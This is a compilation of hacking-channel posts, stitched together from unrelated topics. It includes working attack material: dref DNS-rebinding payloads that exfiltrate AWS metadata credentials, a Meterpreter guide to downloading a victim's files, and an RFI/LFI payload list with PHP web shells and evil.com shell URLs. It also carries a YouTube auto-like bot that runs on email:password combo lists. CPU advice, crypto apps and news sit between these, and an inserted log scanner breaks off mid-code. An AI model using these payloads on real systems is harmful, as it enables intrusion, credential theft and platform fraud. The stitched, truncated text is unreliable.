UNDERCODE COMMUNITY
🦑 Undercode Cyber World!
@UndercodeCommunity


1️⃣ World's first platform that collects and analyzes every new hacking method.
+ AI Practice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
→ Undercode.help
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Attacking headless browser :

dref does the heavy-lifting for DNS rebinding. The following snippet from one of its built-in payloads shows the framework being used to scan a local subnet from a hooked browser; after identifying live web services it proceeds to exfiltrate GET responses, breezing through the Same-Origin policy:
instagram.com/undercodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

>the git https://github.com/FSecureLABS/dref

// mainFrame() runs first
async function mainFrame () {
  // We use some tricks to derive the browser's local /24 subnet
  const localSubnet = await network.getLocalSubnet(24)

  // We use some more tricks to scan a couple of ports across the subnet
  netmap.tcpScan(localSubnet, [80, 8080]).then(results => {
    // We launch the rebind attack on live targets
    for (let h of results.hosts) {
      for (let p of h.ports) {
        if (p.open) session.createRebindFrame(h.host, p.port)
      }
    }
  })
}

// rebindFrame() will have target ip:port as origin
function rebindFrame () {
  // After this we'll have bypassed the Same-Origin policy
  session.triggerRebind().then(() => {
    // We can now read the response across origin...
    network.get(session.baseURL, {
      successCb: (code, headers, body) => {
        // ... and exfiltrate it
        session.log({code: code, headers: headers, body: body})
      }
    })
  })
}

▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Attacking headless browsers with payloads :

1) Getting a Foot in the Door
In his excellent research into HTTP's "hidden" attack surface, PortSwigger's James Kettle highlighted that some web sites will issue HTTP requests back to Referer URLs logged from incoming traffic. Reasons for doing so could vary from marketing to threat analytics.

2) To facilitate the discovery at scale of websites that exhibit this behavior, MWR built reson8. The tool takes a list of URLs and sends a GET request with spoofed HTTP headers to each URL. For websites that answer back, the tool logs details such as round trip time, User-Agent, and, crucially for this research, whether JavaScript code was executed.

3) Several web sites were found to reach back to the spoofed referrals, with round trip times varying from minutes to days. Observing the logs revealed that a subset of these were reaching out from AWS IP addresses and were doing so with a headless Chrome browser.

4) The use of headless Chrome browsers is likely warranted by the spread of JavaScript-heavy web frameworks; indeed the browsers were found to have JavaScript execution enabled. They also typically used the default page load timeout of 240 seconds. The preliminary conditions for a successful DNS rebinding attack were therefore present in these services.

5) By setting up a dref server and sending a request with a Referer URL pointing to it, it would be possible to execute payloads in the context of the browsers' internal networks. This would allow an attacker to explore the network and exfiltrate information from any HTTP services encountered.

6) Hanging Around
The common, stable, DNS rebinding attack requires a victim browser to remain at least 60 seconds on the payload website. This is due to browsers' built-in DNS cache. Browser-based TCP port scanning techniques also require a similar length of time to sweep a port across a class C subnet.

7) As a headless Chrome process will usually exit when the DOM is loaded, it was necessary to cause the browsers to "hang" long enough to carry out the above activities.

8) This was achieved by embedding an <img> tag that would attempt to fetch an image with a declared Content-Length higher than the actual size of the image. This effectively prevents the load DOM event from firing off, causing Chrome to believe the page has not fully loaded.

9) The ability to cause a browser to hang was added as a configuration key to dref. The Express.js implementation of the /hang.png endpoint itself is quite simple:

// fetch an image that will never fully load
router.get('/hang.png', function (req, res, next) {
  res.status(200).set({
    'Content-Length': '1'
  }).send()
})

10) The following dref payload was written to verify the service was accessible from the browser:

import NetMap from 'netmap.js'
import Session from '../libs/session'

const session = new Session()
const netmap = new NetMap()

function main () {
  netmap.tcpScan(['169.254.169.254'], [80, 1234, 4444]).then(results => {
    session.log(results)
  })
}

main()

If the results of this payload showed port 80 to be open, it could be inferred that the AWS metadata endpoint was accessible to the browser. Ports 1234 and 4444 were also scanned to provide reference points and eliminate a false positive, as these would be expected to be closed.

🦑 The results clearly indicated that port 80 was open and reachable:

"hosts": [
  {
    "host": "169.254.169.254",
    "ports": [
      {"port": 80, "delta": 11, "open": true},
      {"port": 1234, "delta": 1000, "open": false},
      {"port": 4444, "delta": 1001, "open": false}
    ],
    "control": 1001
  }
]

Exfiltrating Data across Origins
The AWS metadata endpoint is a read-only service, thus offering no value in CSRF or blind SSRF attacks. To demonstrate a security impact it was necessary to exfiltrate responses from the service.

11) Due to browsers' Same-Origin Policy, it is not possible to directly issue a request from the hooked browser to the AWS metadata endpoint and send the response across origins.
12) DNS rebinding bypasses this policy by dynamically changing the IP address of the attacker's domain to point to the desired target. The requirements are that the target service accept any Host header and not be wrapped in SSL/TLS; both requirements are met by the target endpoint.

13) Most DNS rebinding frameworks load the rebinding attacks in iFrames, which is also dref's default behavior. In this case, the target browsers did not appear to load content from iFrames (this appears to be headless Chrome's behavior based on cursory searches).

🦑 dref's flexibility allows the payloads to be written in order to conduct the entire attack in the same frame. The following payload takes a single HTTP Path argument and exfiltrates the response from the endpoint back to the attacker:

import * as network from '../libs/network'
import Session from '../libs/session'

const session = new Session()

async function main () {
  // configure the A record to point to the AWS metadata endpoint when triggered
  network.postJSON(session.baseURL + '/arecords', {
    domain: window.env.target + '.' + window.env.domain,
    address: '169.254.169.254'
  })

  session.triggerRebind().then(() => {
    // exfiltrate the response from the provided args.path argument
    network.get(session.baseURL + window.args.path, (code, headers, body) => {
      session.log({code: code, headers: headers, body: body})
    })
  })
}

main()

AWS Compromise
The security implications from being able to read data from the AWS metadata endpoint are well documented elsewhere and will not be covered in depth here.

14) Requesting the /latest/user-data/ path will return information the developers wish to make accessible to the instances. This is often a bash script that could contain credentials or paths to an S3 bucket, for example:

"data": {
"code": 200,
"body": "
#!/bin/bash -xe
echo 'KUBE_AWS_STACK_NAME=acme-prod-Nodeasgspotpool2-AAAAAAAAAAAA' >> /etc/environment

[...]

run bash -c \"aws s3 --region $REGION cp s3://acme-kube-prod-978bf8d902cab3b72271abf554bb539c/kube-aws/clusters/acme-prod/exported/stacks/node-asg-spotpool2/userdata-worker-4d3482495353ecdc0b088d42510267be8160c26bff0577915f5aa2a435077e5a /var/run/coreos/$USERDATA_FILE\"

[...]

exec /usr/bin/coreos-cloudinit --from-file /var/run/coreos/$USERDATA_FILE
"
}
🦑 In addition to listing an S3 bucket, the output reveals the service is running on Kubernetes, using Amazon's Auto-Scaling Group (ASG) and Spot Instances. The use of Kubernetes possibly offers other paths to exploitation that were not explored during this research.

The main trophy from interaction with the endpoint is the temporary security credentials. A list of available security credentials can be obtained from the /latest/meta-data/iam/security-credentials/ path:

"data": {
"code": 200,
"body": "eu-north-1-role.kube.nodes.asgspot2"
}
These credentials can be obtained by requesting /latest/meta-data/iam/security-credentials/eu-north-1-role.kube.nodes.asgspot2:

"data": {
"code": 200,
"body": "
\"Code\" : \"Success\",
\"LastUpdated\" : \"2018-08-05T15:33:26Z\",
\"Type\" : \"AWS-HMAC\",
\"AccessKeyId\" : \"AKIAI44QH8DHBEXAMPLE\",
\"SecretAccessKey\" : \"wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\",
\"Token\" : \"AQoDYXdzEJr[....]\",
\"Expiration\" : \"2018-08-05T22:00:54Z\"
"
}"
These can then be used to authenticate to the AWS API:

$ export AWS_ACCESS_KEY_ID=AKIAI44QH8DHBEXAMPLE
$ export AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
$ export AWS_SESSION_TOKEN=AQoDYXdzEJr[...]

$ aws ec2 describe-instances
[...]

🦑 The extent of the impact is determined by the permissions granted with the credentials. This can range from complete compromise to information disclosure. Even with low privileges, attackers may be able to leverage such access to uncover additional attack paths or escalate their privileges.
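The post notes that DNS rebinding only works when the target service accepts any Host header. After a rebind the browser still sends the attacker's domain as Host, so an internal HTTP service that checks the header against its own names refuses the request. The following is an added example, not code from dref or from the original post; the allowlisted names and the helper names (parseHostHeader, isAllowedHost, hostGuard, simulate) are assumptions made for illustration.

```javascript
// Names this internal service is legitimately addressed by (constructed sample values).
const ALLOWED_HOSTS = new Set(['metrics.internal.example', 'localhost', '127.0.0.1', '[::1]'])

// Split a Host header into a lowercase hostname and an optional port.
// Returns null when the header is missing or malformed.
function parseHostHeader (value) {
  if (typeof value !== 'string') return null
  const m = /^(\[[0-9a-f:.]+\]|[a-z0-9.-]+)(?::(\d{1,5}))?$/i.exec(value.trim())
  if (!m) return null
  // Normalise case and drop the trailing dot of a fully qualified name.
  const host = m[1].toLowerCase().replace(/\.$/, '')
  const port = m[2] === undefined ? null : Number(m[2])
  if (host === '' || (port !== null && port > 65535)) return null
  return { host, port }
}

// True only when the Host header names this service.
function isAllowedHost (value, allowed = ALLOWED_HOSTS) {
  const parsed = parseHostHeader(value)
  return parsed !== null && allowed.has(parsed.host)
}

// Middleware with the (req, res, next) signature used by Express and Connect.
// It relies only on fields that Node's http request/response objects provide.
function hostGuard (allowed = ALLOWED_HOSTS) {
  return function (req, res, next) {
    if (isAllowedHost(req.headers.host, allowed)) return next()
    res.statusCode = 421 // Misdirected Request
    res.setHeader('Content-Type', 'text/plain')
    res.end('Host header not recognised\n')
  }
}

// Drive the guard with stub request/response objects and return the status code.
function simulate (hostHeader) {
  const req = { headers: hostHeader === undefined ? {} : { host: hostHeader } }
  const res = { statusCode: 0, setHeader () {}, end () {} }
  hostGuard()(req, res, () => { res.statusCode = 200 })
  return res.statusCode
}

// Constructed requests: one legitimate, one as sent by a browser after a rebind.
const demo = ['metrics.internal.example:8080', 'a1b2c3.rebind.attacker.example']
  .map(h => `${h} -> ${simulate(h)}`)
console.log(demo.join('\n'))
```

For the EC2 metadata endpoint itself, which cannot be wrapped in middleware, requiring IMDSv2 session tokens is the AWS-side control that serves the same purpose.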

▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Comparison of Ryzen 5 3600 and 3600X: which one to buy
instagram.com/undercodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) At $ 200, the Ryzen 5 3600 processor with 6 cores and 12 threads is a very good buy. It is ahead of the 9600K in multi-core benchmarks and is great for gaming. 1% of the minimum productivity is higher, while the price is lower.

2) However, potential buyers are wondering if it is worth taking the Ryzen 5 3600 or better model 3600X?

3) Since its release, the new AMD processors have been constantly ranked among the best in terms of features and price and are in the greatest demand in the Amazon store. To decide, you have to conduct tests.

🦑 The R5 3600 now costs $175, while the 3600X is 20% more expensive at $212. When sales began in mid-2019, the processors were $50 more expensive. The following conclusions can be drawn from the tests of the two processors:

1) Ryzen 5 3600 priced at $ 175 would be the best choice for most buyers.
At the base clock frequency, the 3600X offers a very slight increase in performance, by 5% or lower, compared to the regular 3600. This difference does not justify a cost increase of $ 37.

2) Overclocking of two processors is approximately the same, with a slight increase in performance.

3) As you can understand from the full reviews, the Ryzen 5 3600 has an excellent ratio of features and price and works even on the simplest motherboards based on B350 / B450 chipsets.

4) The 3600X comes with a better cooler, but instead of spending almost $ 40 more on this processor, it is recommended to buy 3600 and a Cooler Master 212 cooler for $ 30, which will be more efficient.

5) Deceptive TDP ratings. The only thing that allows us to rank the R5 3600 as a processor with a TDP of 65 W is its cooling system. The same can be said of the 3600X. The rest of the processors are identical.

WRITTEN BY UNDERCODE
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Youtube bot for auto-like and auto-subscribe 2020
instagram.com/undercodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1)https://github.com/BitTheByte/YouTubeShop

2) cd YouTubeShop

4) $ pip install requests

5) $ pip install colorama

6) $ pip install selenium

7) $ python yt.py

8) Your emails combo file should follow this format e.g[ accounts.txt ]

email0@domain.com:0123456789
email1@domain.com:0123456789
email2@domain.com:0123456789

🦑 Requirements :

>Fast internet connection

>2 Files [Emails Combo, Action File]

🦑 Multiple Videos Example
ciM6wigZK0w
ineO1tIyPfM
XnEqfTjp66A

> Multiple Channels Example
UCs4aHmggTfFrpkPcWSaBN9g
UCzEnk4KWFlSj_PjXLz0-GMA
UCto7D1L-MiRoOziCXK9uT5Q

🦑 To fix some common errors
Post a comment (Scheduled to the next public release)(Delayed)
Post a random comment based on channel's comments and users
Local proxy connection (For debugging) ✓
Local web server to manage the output instead of the console
Advanced debugging mode for advanced users ✓
Migrate to module instead of single .py file

🦑 Tested by Undercode

▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 temporary-email-address-domains :
twitter.com/undercodeNews


@undercodeTesting
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Android Play Store and iOS Apple Store apps that pay you Bitcoin and other cryptocurrency :
pinterest.com/undercode_testing


1) Sweatcoin
Sweatcoin is another free app that is available on both iOS and Android.

With this app, you can earn cryptocurrency (Sweatcoins) by walking. The app tracks your steps and you get paid based on how many you take.
>https://sweatco.in/track?dp=%2F&ea=redirect&ec=Store&el=AppStore&params=%7B%22from%22%3A%22Web%22%2C%22campaign%22%3A%22website_home%22%7D&url=https%3A%2F%2Fitunes.apple.com%2Fapp%2Fsweatcoin-app-that-pays-you%2Fid971023427%3Fct%3Dwebsite_home%26mt%3D8%26pt%3D117705952

> https://sweatco.in/track?dp=%2F&ea=redirect&ec=Store&el=GooglePlay&params=%7B%22from%22%3A%22Web%22%2C%22campaign%22%3A%22website_home%22%7D&url=https%3A%2F%2Fplay.google.com%2Fstore%2Fapps%2Fdetails%3Fid%3Din.sweatco.app%26referrer%3Dutm_campaign%253Dwebsite_home%2526utm_source%253Dwebsite


2) Free Bitcoin
This app is also available on both Android and iOS. It lets you earn Satoshi/Bitcoin by watching videos, playing mobile games, etc.
>https://play.google.com/store/apps/details?id=weekend.bitcoin.free&hl=en_US

>https://itunes.apple.com/us/app/bitcoin-free/id999004027?mt=8

3) Blockchain Game
Blockchain Game is a free app that is available only for Android. It lets you earn Satoshi/Bitcoin by playing games where you do things like build a blockchain out of virtual blocks.
>https://play.google.com/store/apps/details?id=bitcoin.blockchain.game&hl=en_US


4) Alien Run
This is another mobile game available for both Android and iOS. With Alien Run, you can earn Bitcoin by just playing the game where you basically are running through an obstacle course.

>https://play.google.com/store/apps/details?id=bitcoin.alien.run&hl=en_US

> https://itunes.apple.com/us/app/bitcoin-alien-run/id1161356630?mt=8

5) Abundance
Abundance is an app that is available for Android only. It lets you earn Bitcoin by playing games and unlocking quotes about money and success. Every time you unlock a new quote you earn more money.
> https://play.google.com/store/apps/details?id=app.bitcoin.abundance

6)Cloud Bitcoin Miner
This app is also available for Android only. It allows you to do virtual Bitcoin mining.
>https://play.google.com/store/apps/details?id=my.mine.btc&hl=en_US

7) Super Satoshi
With this Android app, you can earn Bitcoin by playing games, participating in daily contests, and referring friends (earn 5% of whatever they earn).
> https://play.google.com/store/apps/details?id=com.cryptbase.supersatoshi&hl=en_US

9)Lympo
With Lympo on your iOS device, you can earn cryptocurrency (called LYM) by walking or running. The app tracks your steps and you can use what you earn towards items like workout gear.
>https://itunes.apple.com/us/app/lympo-walk-run-earn/id1423003823?mt=8

▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Downloading files from a victim with Metasploit Meterpreter scripts :
t.me/undercodetesting


1) >The Meterpreter shell has a lot of neat features, including encryption of all the traffic between our attacking system and target. This prevents any interception and scanning of the data from intrusion detection systems (IDS).

2) Downloading individual files:

From the Meterpreter console it is possible to download individual files using the "download" command. Which is pretty straightforward and easy if you only want to download one file.
Meterpreter has a lot of useful inbuilt scripts to make post exploitation tasks such as data collection easier. To view the options, simply type "run" and then space-tab-tab to see the auto-completion options:

Let's look at "run file_collector" first:

3) In the example below, I wanted to copy all the data from the E: drive of a Windows target, with the exception of a couple of directories that I am not interested in.
(In this actual example I am copying some files from a "Teach yourself C for Linux in 21 days" CD which is in the drive on the target system, onto my attacking system ;o)

3) To view the "run file_collector" options, use "-h"

meterpreter > run file_collector -h
Meterpreter Script for searching and downloading files that
match a specific pattern. First save files to a file, edit and
use that same file to download the choosen files.

🦑 OPTIONS:

    -d   Directory to start search on, search will be recursive.
    -f   Search blobs separated by a |.
    -h   Help menu.
    -i   Input file with list of files to download, one per line.
    -l   Location where to save the files.
    -o   Output File to save the full path of files found.
    -r   Search subdirectories.


meterpreter >

5) As you can see in the description, this is a three stage process. First, we create a file list, then we remove any files we don't want from the list, then we execute the download process.

6) Creating the file list

run file_collector -r -d e:\\ -f * -o /root/Courses/CforLinux/file.txt

We are running the collector recursively, looking for all files on the E: drive, and storing a list of these files in a "file.txt" file on my attacking system.

🦑 As Meterpreter copies files over an encrypted connection, this can make the data transfer slower, so it is best to strip out any unneeded files.

Editing the file list

I don't need some of the directories on the target data drive, so I use grep to remove these, and make a new file "file.lst".

grep -v -e '\\DDD' -e '\\GCC' -e '\\GDB' -e '\\MAKE' /root/Courses/CforLinux/file.txt > /root/Courses/CforLinux/file.lst

(I am removing the \DDD \GCC \GDB \MAKE directories, which is not particularly relevant to you, just an example. I am chopping two carrots with one knife here, as this was useful to me at the time ;o)

🦑 Downloading the file list

Once we have the edited file list we can simply start the file download process with the following command:

run file_collector -i /root/Courses/CforLinux/file.lst -l /root/Courses/CforLinux/


▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 NEWS VIRUS: What is the danger of the Reannewscomm.com virus and how can it be removed, by undercode :
instagram.com/undercodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

>What is the Reannewscomm.com virus?

1) The Reannewscomm.com virus is a browser hijacker that installs on the system without the user's knowledge.

2) The main goal of this unwanted software is to display illegal advertising in any possible way, including sudden redirection to malicious sites, displaying pop-ups and so on. This process cannot be stopped even with the help of ad blockers, including AdGuard.

3) Initially, such activity may seem harmless, but displaying advertising messages is only a cover for gaining access to important personal information, which can later be used to steal passwords from electronic wallets and other confidential data of the PC owner.

🦑 How does the Reannewscomm.com virus work?

1) This malware changes the settings in your web browser, which lets it install a small utility in the browser. You are then usually offered something to buy using e-wallets or debit cards; once the data is entered, the scammers get unlimited access to it.

2) Moreover, “Reannewscomm.com” can use “keylogger” tactics to capture information that you type into the browser while working with legitimate sites, which can also be used by attackers on your behalf.

🦑 How do I know if my computer is infected with the Reannewscomm.com virus?

1) Detecting Reannewscomm.com is quite simple, as its activity is accompanied by the display of a large amount of malicious advertising content, the constant appearance of pop-up browser windows, and so on.

2) In addition, you can immediately notice that your reliable ad blocker no longer works. You may also notice a significant drop in the speed of the browser and the entire system, as a result of the sudden opening of many tabs.

3) Your antivirus program will often display a pop-up message stating that “The threat has been blocked.” If this happens, you should see the phrase “reannewscomm.com” in the corresponding warning.

4) Further, it is important to immediately remove this threat using your scanner, and if this fails, you should try antivirus software from another developer.

🦑 Where did the Reannewscomm.com virus on my computer come from?
Browser hijackers, such as Reannewscomm.com, are often installed along with free or pirated programs that users download voluntarily. Hackers who create this type of unwanted software usually embed it in legitimate software available for download on popular websites. In addition, such viruses may be hidden in notifications during installation with a request to approve the installation of additional components.

WRITTEN BY UNDERCODE
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 WINDOWS 7 MICROSOFT 2020 new
+ New update to fix a bug in Win 7
ALL VERSIONS: BYPASS LINKS FROM MICROSOFT WITHOUT KEY 😁 BY UNDERCODE 2020
t.me/UndercOdeTesting

>No-Need for Product Key To Download from Microsoft

🦑 X64 ALL:

> https://download.microsoft.com/download/5/1/9/5195A765-3A41-4A72-87D8-200D897CBE21/7601.24214.180801-1700.win7sp1_ldr_escrow_CLIENT_ULTIMATE_x64FRE_en-us.iso

🦑 X32 ALL:

> https://download.microsoft.com/download/1/E/6/1E6B4803-DD2A-49DF-8468-69C0E6E36218/7601.24214.180801-1700.win7sp1_ldr_escrow_CLIENT_ULTIMATE_x86FRE_en-us.iso


@UndercOdeTesting

▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Saudi uses SS7 vulnerability to monitor the location and information of any mobile phone user in the United States
recently from undercode tweets 😳
twitter.com/undercodeNews

1) Lawmakers and security experts continue to warn that there are many security risks to global cellular networks. A whistleblower recently said that the Saudi government used these loopholes in tracking "systematic" surveillance activities to track the information of any US citizen.

2) Systematic is a large-scale Saudi surveillance of overseas citizens, using powerful mobile spyware to invade dissidents and activists' phones to monitor their activities. Among them is the Washington Post columnist Jamal Khashoggi, who was killed by a Saudi agent team in the consulate in 2018.

3) According to a data cache obtained by the British Guardian, the location information of millions of Saudi citizens has been recorded for the four months starting in November last year. It is reported that this location tracking was carried out by the three major mobile phone operators in Saudi Arabia through the SS7 (Signaling System Number 7) vulnerability, and there is reason to believe that there is a shadow of the Saudi government.

4) The SS7 signaling system is a common-path signaling system that is widely used in modern communication networks such as public switched telephone networks and cellular communication networks. SS7 is the standard signaling system recommended by the International Telecommunication Union. This is why T-Mobile users can call AT&T users or send text messages to Verizon users.

Written by undercode
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 RFI/LFI Payload List : exploit
t.me/undercodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) As with many exploits, remote and local file inclusions are only a problem at the end of the encoding. Of course it takes a second person to have it. Now this article will hopefully give you an idea of how to protect your website, and most importantly your code, from a file inclusion exploit. I'll give code examples in PHP.

2) Let's look at some of the code that makes RFI / LFI exploits possible.

<a href="index.php?page=file1.php">Files</a>
<?php
// Vulnerable on purpose: the request parameter goes straight into include()
$page = $_GET['page'];
include($page);
?>

3) Now obviously this should not be used. The $page input is not sanitized at all. It is passed directly to the damn web page, which is a big “NO”. Always sanitize any input passing through the browser. When the user clicks on “Files” to visit “files.php”, something like this will appear.

http://localhost/index.php?page=files.php

4) Now if no one has sanitized the input in the $page variable, we can have it pointed to what we want. If hosted on a unix / linux server, we can display the password as configuration files for shaded or uncleaned variable input.

5) Viewing files on the server is a “Local File Inclusion” or LFI exploit. This is no worse than an RFI exploit.

http://localhost/index.php?page=../../../../../../etc/passwd

The code will probably return /etc/passwd. Now let's look at the RFI aspect of this exploit. Let's take the code we used before.

<a href="index.php?page=file1.php">Files</a>
<?php
// Same vulnerable include as above
$page = $_GET['page'];
include($page);
?>

6) Now suppose we write something like…

http://localhost/index.php?page=http://google.com/

Probably where the $page variable was originally placed on the page, we get the google.com homepage. This is where the coder can be hurt. We all know what c99 (shell) can do, and if coders are careful, they may be included in the page, allowing users to surf through sensitive files and contacts at the appropriate time. Let's look at something simpler that can happen on a web page. The faster and more dirty use of RFI exploitation is to your advantage. Now, create a file named “test.php” and put the following code in it and save it.

<?php
passthru($_GET['cmd']);
?>


7) Now this file is something you can use to your advantage to include it on a page with RFI exploitation. The passthru() command in PHP is very evil, and many hosts call it “out of service for security reasons”. With this code in test.php, we can send a request to the web page, including file inclusion exploit.

http://localhost/index.php?page=http://someevilhost.com/test.php

8) When the code makes a $_GET request, we must provide a command to pass to passthru(). We can do something like this.

http://localhost/index.php?page=http://someevilhost.com/test.php?cmd=cat /etc/passwd

9) This unix machine will also extract the file /etc/passwd using the cat command. Now we know how to exploit RFI, so now we need to know how to contain it, making it impossible for anyone to execute commands or include remote pages on your server. First, we can disable passthru(). But anything on your site can use it again (hopefully not). But this is the only thing you can do. I suggest cleaning the inputs as I said before. Now, instead of just passing variables directly to the page, we can use a few PHP-proposed structures within functions. Initially, chop() from Perl was adapted to PHP, which removes whitespaces from an array. We can use it like this.

<a href="index.php?page=file1.php">Files</a>
<?php
$page = chop($_GET['page']);
include($page);
?>

10) There are many functions that can clean a string: htmlspecialchars(), htmlentities(), stripslashes() and more. In terms of confusion, I prefer to use my own functions. We can write a function in PHP that can clean everything for you; here I've prepared something easy and quick for you.

<?php
// Strip HTML/PHP tags, then encode HTML special characters
function cleanAll($input) {
    $input = strip_tags($input);
    $input = htmlspecialchars($input);
    return $input;
}
?>

11) Now I hope you can see what's going on inside this function, so you can add your own. I would suggest using the str_replace() function, and there are a lot of other functions to clean input. Be considerate and stop the RFI & LFI exploit frenzy!

Basic LFI (null byte, double encoding and other tricks) :
http://example.com/index.php?page=etc/passwd
http://example.com/index.php?page=etc/passwd%00
http://example.com/index.php?page=../../etc/passwd
http://example.com/index.php?page=%252e%252e%252f
http://example.com/index.php?page=....//....//etc/passwd
Interesting files to check out :

/etc/issue
/etc/passwd
/etc/shadow
/etc/group
/etc/hosts
/etc/motd
/etc/mysql/my.cnf
/proc/[0-9]*/fd/[0-9]* (first number is the PID, second is the filedescriptor)
/proc/self/environ
/proc/version
/proc/cmdline
Basic RFI (null byte, double encoding and other tricks) :
http://example.com/index.php?page=http://evil.com/shell.txt
http://example.com/index.php?page=http://evil.com/shell.txt%00
http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt
LFI / RFI Wrappers :
LFI Wrapper rot13 and base64 - php://filter case insensitive.

http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php
http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php


12) Can be chained with a compression wrapper.
http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
LFI Wrapper ZIP :
echo "</pre><?php system($_GET['cmd']); ?></pre>" > payload.php;
zip payload.zip payload.php;
mv payload.zip shell.jpg;
rm payload.php

http://example.com/index.php?page=zip://shell.jpg%23payload.php
RFI Wrapper DATA with "" payload :
http://example.net/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
RFI Wrapper EXPECT :
http://example.com/index.php?page=php:expect://id
http://example.com/index.php?page=php:expect://ls
XSS via RFI/LFI with "" payload :
http://example.com/index.php?page=data:application/x-httpd-php;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+
LFI to RCE via /proc/*/fd :
Upload a lot of shells (for example : 100)
Include http://example.com/index.php?page=/proc/$PID/fd/$FD with $PID = PID of the process (can be bruteforced) and $FD the filedescriptor (can be bruteforced too)
LFI to RCE via Upload :
http://example.com/index.php?page=path/to/uploaded/file.png

@undercodeOfficial
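The request shapes listed in this post (traversal sequences, null bytes, double encoding, mixed-case stream wrappers, remote URLs) can be recognised in web server logs once each parameter value is decoded until it stops changing. The following is an added example, not part of the original post: the log lines are constructed, the rule names and helper functions are assumptions, and the wrapper list adds phar: and file: to the schemes the post names.

```javascript
// Constructed sample access-log lines (combined log format, documentation IP ranges).
const SAMPLE_LOG = [
  '198.51.100.4 - - [01/Jan/2020:10:00:00 +0000] "GET /index.php?page=files.php HTTP/1.1" 200 812',
  '203.0.113.9 - - [01/Jan/2020:10:00:02 +0000] "GET /index.php?page=../../etc/passwd HTTP/1.1" 200 1433',
  '203.0.113.9 - - [01/Jan/2020:10:00:03 +0000] "GET /index.php?page=%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 1433',
  '203.0.113.9 - - [01/Jan/2020:10:00:04 +0000] "GET /index.php?page=....//....//etc/passwd%00 HTTP/1.1" 404 0',
  '203.0.113.9 - - [01/Jan/2020:10:00:05 +0000] "GET /index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php HTTP/1.1" 200 2210',
  '203.0.113.9 - - [01/Jan/2020:10:00:06 +0000] "GET /index.php?page=http:%252f%252fevil.example%252fshell.txt HTTP/1.1" 200 90'
].join('\n')

// Percent-decode byte-wise until the value stops changing, so %252e -> %2e -> "." is seen.
// Byte-wise decoding never throws on malformed input and is enough for ASCII indicators.
function fullyDecode (raw, maxRounds = 5) {
  let text = raw
  let rounds = 0
  while (rounds < maxRounds) {
    const next = text.replace(/%([0-9a-f]{2})/gi, (_, hex) => String.fromCharCode(parseInt(hex, 16)))
    if (next === text) break
    text = next
    rounds++
  }
  return { text, rounds }
}

// Each rule is [name, predicate over the fully decoded value].
const RULES = [
  // Two or more dots before a slash also covers "....//", which survives naive "../" stripping.
  ['directory-traversal', t => /\.{2,}[\/\\]/.test(t)],
  ['null-byte', t => t.includes('\0')],
  ['stream-wrapper', t => /^(php|zip|data|expect|phar|file):/i.test(t)],
  ['remote-url', t => /^(https?|ftp):\/\//i.test(t)],
  ['sensitive-path', t => /(^|\/)(etc\/(passwd|shadow)|proc\/(self|\d+)\/)/i.test(t)]
]

// Return the names of all rules a raw (still encoded) parameter value triggers.
function inspectValue (raw) {
  const { text, rounds } = fullyDecode(raw)
  const reasons = RULES.filter(([, test]) => test(text)).map(([name]) => name)
  // Repeated encoding is only reported alongside another indicator to limit noise.
  if (rounds > 1 && reasons.length > 0) reasons.push('multi-encoded')
  return reasons
}

// Parse one log line; return null when nothing in its query string is suspicious.
function scanLogLine (line) {
  const m = /^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP\/[\d.]+"/.exec(line)
  if (!m) return null
  const [, client, target] = m
  const q = target.indexOf('?')
  if (q === -1) return null
  const hits = []
  for (const pair of target.slice(q + 1).split('&')) {
    const eq = pair.indexOf('=') // split on the first "=" only; values may contain more
    if (eq === -1) continue
    const reasons = inspectValue(pair.slice(eq + 1))
    if (reasons.length > 0) hits.push({ param: pair.slice(0, eq), reasons })
  }
  return hits.length > 0 ? { client, path: target.slice(0, q), hits } : null
}

function scanLog (text) {
  return text.split('\n').map(scanLogLine).filter(Boolean)
}

for (const alert of scanLog(SAMPLE_LOG)) {
  for (const hit of alert.hits) {
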